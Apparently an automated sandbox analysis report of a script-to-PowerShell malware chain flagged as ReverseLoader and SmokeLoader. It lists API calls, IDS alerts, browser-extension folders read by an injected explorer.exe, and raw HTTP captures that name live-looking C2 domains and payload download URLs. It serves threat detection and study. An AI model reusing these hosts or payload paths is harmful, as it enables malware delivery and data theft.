Source:	Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000009.00000002.2163834487.000000000709A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2105130224.00000000049D0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000009.00000002.2163834487.000000000709A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: $^q7C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.pdb source: powershell.exe, 00000001.00000002.1934299085.0000000005367000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02D62B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,	17_2_02D62B15
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02D63ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,	17_2_02D63ED9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02D61D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,	17_2_02D61D4A
Source: C:\Windows\explorer.exe	Code function: 18_2_001E30A8 FindFirstFileW,FindNextFileW,FindClose,	18_2_001E30A8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_0066255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose,	19_2_0066255C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 20_2_030415BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,	20_2_030415BE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 20_2_030414D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,	20_2_030414D8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 20_2_030413FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,	20_2_030413FE
Source: C:\Windows\explorer.exe	Code function: 21_2_00711DB0 FindFirstFileW,FindNextFileW,FindClose,	21_2_00711DB0
Source: C:\Windows\explorer.exe	Code function: 21_2_00711EB4 FindFirstFileW,FindNextFileW,FindClose,	21_2_00711EB4

Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.4:49730 -> 107.172.44.178:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49781 -> 46.173.214.24:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49817 -> 46.173.214.24:80
Source: Network traffic	Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.215.209.78:443 -> 192.168.2.4:49731

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\explorer.exe

Network Connect: 46.173.214.24 80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://prolinice.ga/index.php
Source: Malware configuration extractor	URLs: http://vilendar.ga/index.php

Source: global traffic	HTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1Host: 1017.filemail.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /53/WRFFRGT.txt HTTP/1.1Host: 107.172.44.178Connection: Keep-Alive

Source: Joe Sandbox View

IP Address: 142.215.209.78 142.215.209.78

Source: Joe Sandbox View	ASN Name: GARANT-PARK-INTERNETRU GARANT-PARK-INTERNETRU
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic

Suricata IDS: 2829848 - Severity 2 - ETPRO MALWARE SmokeLoader encrypted module (3) : 46.173.214.24:80 -> 192.168.2.4:49781

Source: global traffic	HTTP traffic detected: GET /53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 107.172.44.178Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://siwffuchsxpuu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 210Host: prolinice.ga
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://prolinice.ga/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 4431Host: prolinice.ga

Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.178

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 1_2_046B4B90 URLDownloadToFileW,

1_2_046B4B90

Source: global traffic	HTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1Host: 1017.filemail.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 107.172.44.178Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /53/WRFFRGT.txt HTTP/1.1Host: 107.172.44.178Connection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: 1017.filemail.com
Source: global traffic	DNS traffic detected: DNS query: prolinice.ga

Source: unknown

HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://siwffuchsxpuu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 210Host: prolinice.ga

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 17:38:08 GMTServer: Apache/2.4.59 (Debian)Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 35 32 64 35 33 0d 0a 84 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 4d 93 dc e5 25 0a ed e2 44 4a 3b 47 a5 77 e3 2c 25 29 67 7b b4 1d 52 9a 46 7a 54 8c 7e 72 ec d5 7e f4 44 cf b3 6b eb a7 41 63 d4 4a be ec 6e e8 4b 42 15 65 fa 28 3b 12 b5 17 01 51 60 01 78 3a 91 7f 32 8b 47 78 ce d5 ea f0 7b d0 1e 45 fe 16 dc 84 fa d9 be 93 bd db 4a 1d 9f ac 79 dd 2f b5 84 79 6d 21 b3 90 51 dc c2 a5 14 5d bd 12 b6 4b 00 ca 2c 05 00 7c e1 f7 57 09 03 02 00 09 00 9e 03 00 00 53 1f 7d 22 77 32 62 71 76 3f 4f 55 52 12 42 00 c9 32 ee 68 fe 0f ca 76 74 07 d6 d6 f9 b8 92 29 e8 55 92 92 3e c8 50 dd 24 a4 99 ce 5c 90 b9 3b fc 51 49 c0 0d f0 19 d3 e9 92 2a 7a f7 09 00 bb 7a b8 01 84 b7 a3 64 8b 0b f3 9f 79 57 fa 26 ce 46 fb 76 8c c7 a7 e0 22 d1 2d c9 1e 43 c3 ef c1 4c dd a0 af 3d b8 a8 a5 fb c0 70 8e 98 0e df 4b cc 40 42 f2 70 5e a2 6b 51 b2 9f 66 73 fe c7 15 ac cd f6 9d 88 6a 44 07 1e 8d 8b 6b 24 18 2b 4b 2a ec 81 b7 50 50 a4 4e ad cf 32 5c c0 15 b4 57 90 1b 0d ee 6c f7 54 23 c9 ed 8e bc 36 a0 b4 7a c0 a1 84 b8 ba d4 a3 62 52 1c ae d9 4b 5a 18 a9 1c db 20 3a d0 44 3f 55 06 6b bf 4b 63 27 f1 ac 4f fe d1 04 8b 3f ba 91 69 f9 fb 81 fe 97 af cd a6 40 69 e9 33 b2 a6 45 cc f6 83 0e 7c 20 5b 7d 1d a4 53 32 fe 9d cc 54 71 e4 4c 20 4c b2 37 b3 8e 0f 1b d8 40 78 f3 c6 c7 84 1a aa 21 d4 fa 17 f2 46 ab 2a 9b db a1 fa 45 c5 f8 a8 f5 78 d7 7b c7 34 f8 40 a6 ce 9e 68 07 d1 3b db 70 67 ae de de 5f 1b 81 d3 b1 e8 be 06 9b bd 51 aa 40 d1 5b 4e 04 32 d7 97 2a e0 96 cc f3 08 be 06 f4 ef f1 48 d0 25 d9 73 3b 22 c7 0f b5 72 bf c3 e5 81 32 31 c9 f4 a1 4c ee 90 56 05 52 a9 1c 76 6f 99 dc ff 39 62 09 4e 0e 7c a8 50 2c 99 64 73 2c f8 8e 19 ec 5e 4c 2b 1b 6a 20 6d e3 2e 26 3e f2 ee 67 21 84 c5 3d 2f 72 90 3a ea 6c 5f b3 01 1d 55 2a 97 6b 1b 48 d7 18 d0 92 ef 20 3e 28 8e b6 b7 0f 4f c2 e3 41 ee a3 e2 e5 4f 7c 04 cf 84 8c 71 e5 91 3b ef 9c 40 2b b4 81 b3 6f 0c e5 ea f4 a9 02 25 53 be 6e 6e 71 ce db f8 20 6e 55 5b a4 66 26 ed 43 1b d2 35 1a 47 54 5d 20 0c 1b 03 8a 54 94 fb f1 d9 5d 91 01 a9 f6 90 b3 3e c6 10 cc 67 ca 7b 76 0b 97 06 5b d8 d2 e2 0f 79 af ed 1b 53 92 e1 e9 cc 7a b6 b9 98 42 38 a5 00 49 58 88 86 83 3c a1 5c d3 72 7d ad bc 8d 80 b4 ea 85 32 d9 b9 33 ce ae d5 90 f4 bb 3a c9 3d 3b 48 a7 e3 58 dd be d0 8a aa 01 3e 48 f4 19 2b 95 d5 65 ff b4 78 a1 d2 cd 69 0a 91 f7 6a 18 3d 4f 75 b1 bc 1b b1 60 c8 27 8c 70 db 33 0d a6 f2 ed 80 8d aa 7c 4a 8c 59 8c 3d 99 a9 52 09 0f d9 5e 58 eb 6f 11 c9 5b 23 0e a9 04 11 b7 a5 6b eb 6e 85 01 89 5e cf 54 06 96 02 2d c3 92 6c 61 40 ee 39 ff fa 3e 0d c6 24 8f 1c 02 ac 7a ab 13 d0 be a8 cb 90 7c 6b d5 fb ae 58 ee db 76 10 36 cb d3 c0 5d 0e e0 08 4f 38 94 52 92 70 bf 7c bd c4 0d 6f f9 74 7a 41 a6 59 ea 90 d6 8f 1b 32 75 08 c5 9a 2d a0 6a 8b fd 6b c4 c2 37 35 48 bd 8c 96 77 e4 62 45 8d 49 72 d0 11 c5 42 47 60 cf 79 cc d5 44 76 86 c6 57 e5 fc f1 b9 98 00 52
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 17:38:16 GMTServer: Apache/2.4.59 (Debian)Content-Length: 409Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 39 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 70 72 6f 6c 69 6e 69 63 65 2e 67 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.59 (Debian) Server at prolinice.ga Port 80</address></body></html>

Source: powershell.exe, 00000001.00000002.1934299085.0000000005367000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://107.172.44.178/53/seemybe
Source: powershell.exe, 00000001.00000002.1934299085.0000000005367000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1953902747.0000000007260000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF
Source: powershell.exe, 00000001.00000002.1953902747.0000000007260000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF4
Source: powershell.exe, 00000001.00000002.1954134272.0000000007290000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF9
Source: powershell.exe, 00000001.00000002.1954134272.00000000072A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIFv
Source: powershell.exe, 00000001.00000002.1954134272.00000000072A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF~
Source: explorer.exe, 0000000E.00000000.2147790112.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2150818105.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3018536895.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: powershell.exe, 00000001.00000002.1932388414.0000000002C4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000009.00000002.2161675097.0000000006F03000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoftOZ
Source: explorer.exe, 0000000E.00000000.2147790112.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2150818105.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3018536895.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 0000000E.00000000.2147790112.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2150818105.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3018536895.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: powershell.exe, 00000003.00000002.1824151467.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: powershell.exe, 00000001.00000002.1950833514.0000000005878000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1826452749.00000000065A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2105537530.0000000005AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 0000000E.00000000.2147790112.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2150818105.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3018536895.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 0000000E.00000000.2147790112.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3014261792.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: powershell.exe, 00000009.00000002.2105537530.0000000004BC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 00000011.00000002.2435370827.0000000003231000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://prolinice.ga/
Source: explorer.exe, 00000011.00000002.2435370827.0000000003231000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0
Source: explorer.exe, 00000011.00000002.2435370827.00000000031D0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2435370827.0000000003231000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2391356204.0000000000538000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.2397253387.0000000000767000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3007335205.0000000003337000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2660889863.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.3008863244.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3007619129.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3008824207.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3007631723.0000000000C38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://prolinice.ga/index.php
Source: explorer.exe, 00000011.00000002.2435370827.00000000031D0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2391356204.0000000000538000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.2397253387.0000000000767000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3007335205.0000000003337000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2660889863.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.3008863244.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3007619129.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3008824207.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3007631723.0000000000C38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://prolinice.ga/index.phpMozilla/5.0
Source: explorer.exe, 00000011.00000002.2435370827.00000000031D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://prolinice.ga/index.phpR
Source: explorer.exe, 00000011.00000002.2435370827.000000000321C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://prolinice.ga/ndex.phps
Source: explorer.exe, 0000000E.00000002.3025073202.000000000C4A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://prolinice.ga:80/index.php
Source: explorer.exe, 0000000E.00000002.3016670516.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.2150001828.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.2152605558.0000000009B60000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: powershell.exe, 00000003.00000002.1824151467.0000000005696000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.1934299085.0000000004811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1824151467.0000000005541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2660757164.0000000005351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2105537530.0000000004A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.1824151467.0000000005696000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: explorer.exe, 0000000E.00000002.3027555495.000000000CADB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://siwffuchsxpuu.net/
Source: explorer.exe, 0000000E.00000002.3027555495.000000000CADB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://siwffuchsxpuu.net/application/x-www-form-urlencodedMozilla/5.0
Source: powershell.exe, 00000009.00000002.2105537530.0000000004BC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 0000000E.00000002.3014261792.00000000079B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.00000000079B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 00000003.00000002.1828441360.0000000007B90000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2652155063.0000000003525000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000009.00000002.2105537530.0000000004BC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://1017.filemail.com
Source: powershell.exe, 00000009.00000002.2105537530.0000000004BC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6S
Source: explorer.exe, 00000011.00000003.2404033488.000000000322E000.00000004.00000020.00020000.00000000.sdmp, 3D75.tmp.17.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 0000000E.00000002.3025073202.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2158219797.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 0000000E.00000000.2147790112.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3014261792.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 0000000E.00000000.2147790112.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3014261792.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: powershell.exe, 00000003.00000002.1824151467.0000000005541000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6PO
